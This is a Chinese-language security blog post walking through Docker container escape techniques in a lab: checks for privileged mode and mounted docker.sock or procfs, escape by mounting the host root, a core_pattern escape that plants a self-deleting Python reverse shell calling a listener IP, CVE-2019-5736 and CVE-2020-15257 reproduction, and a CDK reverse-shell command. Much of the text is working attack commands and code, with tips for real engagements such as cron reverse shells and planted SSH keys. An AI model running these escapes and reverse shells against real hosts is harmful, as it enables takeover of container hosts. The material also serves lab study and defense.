云上攻防:云原生篇&Docker容器逃逸
本文最后更新于85 天前,其中的信息可能已经过时。

什么是Docker

简而言之就是一个容器技术,类似于VM虚拟机,别人环境封装好打包成一个镜像,使用docker技术就能快速把这个镜像环境还原出来。

Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。

Docker技术对于渗透测试的影响

docker环境对于渗透测试的影响就是攻击者攻击虚拟空间磁盘,拿到最高权限也是虚拟空间的权限,而不是真实物理环境的权限

这时候就有一个衍生技术docker逃逸,Docker容器逃逸是指攻击者突破容器的隔离机制,获取底层主机系统的控制权,类似于以前听过较多的虚拟机逃逸

容器逃逸方法总结

在开始之前对于容器逃逸主要有以下三种方法:

  1. 不安全的配置
  2. 相关程序漏洞
  3. 内核漏洞

#判断是否为容器环境

当拿到shell权限,看到数字和字母随机生成的主机名大概率猜到在容器里了,查看进程,进程数很少,PID为1的进程为业务进程,这也是容器环境的典型特征。当然,以上这两种都是比较主观的判断。

可参考文章判断方法:https://blog.csdn.net/qq_23936389/article/details/131486643

这里列举一个判断方法,在高权限情况下执行命令

cat /proc/1/cgroup | grep -qi docker && echo "Is Docker" || echo "Not Docker"

不安全启动

(不安全启动 适用于java jsp高权限无需提权 还要提权才能逃逸)


1、特权模式

执行以下命令,如果返回 Is privileged mode 则说明当前是特权模式

cat /proc/self/status | grep -qi "0000003fffffffff" && echo "Is privileged mode" || echo "Not privileged mode"

如果返回 Not privileged mode 则说明当前不是特权模式

#2、挂载 Docker Socket

执行以下命令,如果返回 Docker Socket is mounted. 说明当前挂载了 Docker Socket

ls /var/run/ | grep -qi docker.sock && echo "Docker Socket is mounted." || echo "Docker Socket is not mounted."

如果返回 Docker Socket is not mounted. 则说明没有挂载

#3、挂载 procfs

执行以下命令,如果返回 Procfs is mounted. 说明当前挂载了 procfs

find / -name core_pattern 2>/dev/null | wc -l | grep -q 2 && echo "Procfs is mounted." || echo "Procfs is not mounted."

如果返回 Procfs is not mounted. 则说明没有挂载

#4、挂载宿主机根目录

执行以下命令,如果返回 Root directory is mounted. 则说明宿主机目录被挂载

find / -name passwd 2>/dev/null | grep /etc/passwd | wc -l | grep -q 7 && echo "Root directory is mounted." || echo "Root directory is not mounted."

如果返回 Root directory is not mounted. 则说明没有挂载

#5、Docker remote api 未授权访问

执行以下命令,如果返回 Docker Remote API Is Enabled. 说明目标存在 Docker remote api 未授权访问

IP=`hostname -i | awk -F. '{print $1 "." $2 "." $3 ".1"}' ` && timeout 3 bash -c "echo >/dev/tcp/$IP/2375" > /dev/null 2>&1 && echo "Docker Remote API Is Enabled." || echo "Docker Remote API is Closed."

如果返回 Docker Remote API is Closed. 则表示目标不存在 Docker remote api 未授权访问

容器逃逸检测脚本

项目地址:https://github.com/teamssix/container-escape-check

直接在容器中执行以下命令即可

wget https://raw.githubusercontent.com/teamssix/container-escape-check/main/container-escape-check.sh -O -| bash

挂载 Docker Socket 逃逸

Docker Socket 用来与守护进程通信即查询信息或者下发命令。

Socket 逃逸简单来说就挂载 Docker Socket 逃逸是通过在容器内挂载宿主机的 /var/run/docker.sock 文件,利用 Docker 守护进程的权限,从而在宿主机上创建和运行新的容器,实现从容器到宿主机的权限逃逸。

#拉去环境
docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
#进入环境
docker exec -it with_docker_sock /bin/bash
#检测环境
ls -lah /var/run/docker.sock

最近dockerhub已经不能访问了,使用原先的方式安装docker,服务器上也总是连接不上,感觉实战中很容易出现访问不了docker仓库的问题,当时因为白名单网站的缘故最好的方法还是建议先尝试访问官方网站自动化安装
这里提供几个方法尝试避免网络问题导致下载失败的问题

# 更新软件包索引
sudo apt-get update
 
# 安装需要的软件包以使apt能够通过HTTPS使用仓库
sudo apt-get install ca-certificates curl gnupg lsb-release

#官方安装程序
curl -fsSL https://get.docker.com/| sh	

#使用--mirror参数来指定镜像源
curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

# 验证是否成功安装了docker
systemctl status docker
docker --version

# 添加阿里云官方GPG密钥
curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
 
# 写入阿里云Docker仓库地址
sh -c 'echo "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable" > /etc/apt/sources.list.d/docker.list
或使用清华大学源
# 添加Docker官方的GPG密钥
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
 
# 设置稳定版仓库
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

更新源并安装Docker

apt-get update
apt-get install docker-ce docker-ce-cli containerd.io

# 验证是否成功安装了docker
systemctl status docker
docker --version

实在还是没法安装可以本机下载然后传输到目标主机,就是流量太大容易被识别

wget -q https://get.docker.com/ -O get-docker.sh
sh get-docker.sh

容器内成功安装好docker后在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部

docker run -it -v /:/host ubuntu /bin/bash
chroot /host

逃逸成功

root@e51f4a967c75:/# docker --version
Docker version 27.2.0, build 3ab4256
root@e51f4a967c75:/# docker run -it -v /:/host ubuntu /bin/bash
root@0e2481d99793:/# chroot /host
# ls
bin   dev  home  lib32	libx32	    media  opt	 root  sbin  srv       sys  usr
boot  etc  lib	 lib64	lost+found  mnt    proc  run   snap  swap.img  tmp  var
# ls root
1.sh  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  burp2024  docker-compose  snap
# 

本机root目录

成功将本机目录挂载到新的容器内部

成功后chroot /test 切换后和打redis一样,定时任务反弹shell或者ssh传公钥

Privileged 特权模式容器逃逸

特权模式容器逃逸指的是在容器以特权模式(--privileged)运行时,容器内的进程能够获取宿主机上的root权限,从而可以执行如挂载文件系统、访问所有设备等操作,攻击者可能利用这种特权访问宿主机系统,实现从容器到宿主机的逃逸。特权模式下,容器内的root用户拥有等同于宿主机root用户的权限,这使得逃逸变得相对容易。

以特权模式进入一个环境

docker run --rm --privileged=true -it alpine
#检测是否为docker环境
/ # ls -al /
total 64
drwxr-xr-x    1 root     root          4096 Sep  3 08:54 .
drwxr-xr-x    1 root     root          4096 Sep  3 08:54 ..
-rwxr-xr-x    1 root     root             0 Sep  3 08:54 .dockerenv
#判断当前是否为特权模式
cat /proc/self/status | grep CapEff

成功逃逸


挂载宿主机procfs逃逸

将宿主机/proc/sys/kernel/core_pattern文件挂载到容器/host/proc/sys/kernel/core_pattern中

docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu

在容器中找到两个core_pattern文件那可能就是挂载了宿主机的 procfs

root@1b4722987fd1:/tmp# find / -name core_pattern
/proc/sys/kernel/core_pattern			#容器本身procfs
/host/proc/sys/kernel/core_pattern	#宿主机procfs

找到当前容器在宿主机下的绝对路径

cat /proc/mounts | xargs -d ',' -n 1 | grep workdir
#将work目录变成merged目录就是容器所在宿主机的绝对路径
workdir=/var/lib/docker/overlay2/ba7735195668f14dcd3109006c55f460a184e0004a7627b7806ee805a982d5db/

创建反弹shell脚本

cat >/tmp/.x.py << EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = "192.168.0.21"
lport = 8848
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    os.remove('/tmp/.x.py')
    s.close()
if __name__ == "__main__":
    main()
EOF

赋予执行权限 chmod 777 /tmp/.x.py

写入反弹 shell文件在宿主机执行路径到目标的/proc/sys/kernel/core_pattern 文件

echo -e "|/var/lib/docker/overlay2/ba7735195668f14dcd3109006c55f460a184e0004a7627b7806ee805a982d5db/merged/tmp/.x.py \rcore    " >  /host/proc/sys/kernel/core_pattern

从 2.6.19 内核版本开始,Linux 支持在 /proc/sys/kernel/core_pattern 中使用新语法。如果该文件中的首个字符是管道符 | ,那么该行的剩余内容将被当作用户空间程序或脚本解释并执行。
/proc/sys/kernel/core_pattern 是 Linux 系统中的一个特殊文件,它属于 /proc 文件系统,这是一个虚拟文件系统,提供了一个接口到内核数据结构。这个特定文件用于定义当程序崩溃导致核心转储(core dump)时,核心转储文件的命名模式和位置。
核心转储是操作系统在程序发生严重错误(如段错误)时创建的文件,包含了程序崩溃时的内存镜像和有关程序状态的其他信息,对于程序调试和确定崩溃原因非常有用。

  • core_pattern 文件的内容决定了核心转储文件的命名和存储位置。
  • 默认情况下,这个文件可能只包含一个单词 core,表示核心转储文件将被命名为 core 并存储在程序崩溃时的当前目录下。
  • 可以配置这个文件来更改核心转储文件的存储位置和命名方式。例如,可以设置路径和文件名,甚至可以指定一个处理核心转储的程序。
  • 上述解释就是我们要将反弹shell文件路径写入core_pattern 中写入引起docker崩溃的文件,诱导系统加载core_pattern 文件

安装vim以及gcc (实战建议找同内核的机器编译好传上去)

apt-get update -y && apt-get install vim gcc -y

写入崩溃文件

cat >/tmp/x.c << EOF
#include <stdio.h>
int main(void)
{
    int *a = NULL;
    *a = 1;
    return 0;
}
EOF

编译好执行

gcc x.c -o x
./x

另一台机器开启监听

nc -lvvp 8848

云原生-Docker安全-容器逃逸&版本漏洞

CVE-2019-5736 runc容器逃逸

  • 复现建议:复现之前做好快照,因为复现过程中会破坏docker环境。
  • 漏洞影响版本:docker version <=18.09.2 RunC version <=1.0-rc6

下载特定版本清华大学镜像站点历史包,这里依赖难解决

# 下载特定版本的 Docker CE `.deb` 包
wget https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/dists/bionic/pool/stable/amd64/docker-ce_18.06.1~ce~3-0~ubuntu_amd64.deb

# 安装 `.deb` 包
dpkg -i docker-ce_18.06.1~ce~3-0~ubuntu_amd64.deb

# 解决依赖问题
apt-get install -f

或centos用阿里的源

# 更新系统并安装必要的依赖项
sudo yum update -y
sudo yum install -y yum-utils device-mapper-persistent-data lvm2

# 添加阿里云的 Docker 仓库
sudo vi /etc/yum.repos.d/docker-ce.repo
# 添加以下内容:
[docker-ce-stable]
name=Docker CE Stable - $basearch
baseurl=https://mirrors.aliyun.com/docker-ce/linux/centos/7/$basearch/stable
enabled=1
gpgcheck=1
gpgkey=https://mirrors.aliyun.com/docker-ce/linux/centos/gpg

# 列出可用的 Docker 版本
yum list docker-ce --showduplicates | sort -r

# 安装特定版本的 Docker
sudo yum install docker-ce-18.06.1.ce-3.el7

# 启动并启用 Docker
sudo systemctl start docker
sudo systemctl enable docker

# 删除现有版本的 runC
sudo yum remove -y runc

# 使用清华大学开源软件镜像站下载 runC
curl -L -o /usr/bin/runc https://mirrors.tuna.tsinghua.edu.cn/github-release/opencontainers/runc/releases/download/v1.0.0-rc6/runc.amd64

sudo 从  

# 验证 Docker 版本
docker --version

# 验证 runC 版本
runc --version

POC下载地址CVE-2019-5736-PoC

对main.go文件内容进行修改

使用go环境编译好后上传至目标

由于是模拟环境,因此在这里就在终端直接上传了,如果在实战情况下拿了shell,应该也有上传文件的权限
上传之后赋予POC执行权限。

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
#复制至虚拟机运行
docker cp main xxxx:/
chmod 777 main 
./main

执行完POC后看到successfully我们需要模拟管理员重新进入容器才能成功执行

[root@hello ~]# docker exec -it fc03 /bin/bash
No help topic for '/bin/bash'

成功逃逸

CVE-2020-15257 containerd逃逸

  • 漏洞影响版本:

containerd < 1.4.3
containerd < 1.3.9
这里使用阿里云的源安装对应漏洞版本的Docker

sudo apt-get update
sudo apt-get install -y ca-certificates curl software-properties-common

curl -fsSL https://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -

sudo add-apt-repository "deb [arch=amd64] https://mirrors.aliyun.com/docker-ce/linux/ubuntu bionic stable"

sudo apt-get update

apt-cache madison docker-ce

sudo apt-get install -y docker-ce=5:19.03.6~3-0~ubuntu-bionic docker-ce-cli=5:19.03.6~3-0~ubuntu-bionic containerd.io=1.2.4-1

用root用户以共享主机网络的方式启动容器–net=host

docker run -itd --net=host ubuntu:latest /bin/bash
docker exec -it 容器id /bin/bash

将自动化CDK复制到容器运行

docker cp cdk_linux_amd64 容器id:/
chmod 777 cdk_linux_amd64

尝试自动化检测漏洞

./cdk_linux_amd64 auto-escape id
#
./cdk_linux_amd64 run shim-pwn reverse 192.168.0.24 8888   #反弹shell

这里按照网上的方法一直复现不成功,尝试换了很多环境,怀疑是用的官方仓库缺少了一些组件,这里就等有空成功研究完复现了再补上

#所需版本 docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1


这里用自动化脚本测试特权模式成功


自动挂载成功

觉得有帮助可以投喂下博主哦~感谢!
作者:明弟有理想
版权声明: 本站所有文章,如无特殊说明或标注,均为本站原创发布。转载请注明文章地址及作者。
如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
文章声明:
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全,本文内容未隐讳任何个人、群体、公司。请注意,本文并非文学作品,请勿过度理解。请大家自觉遵守《网络安全法》,感谢您的理解与支持!
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇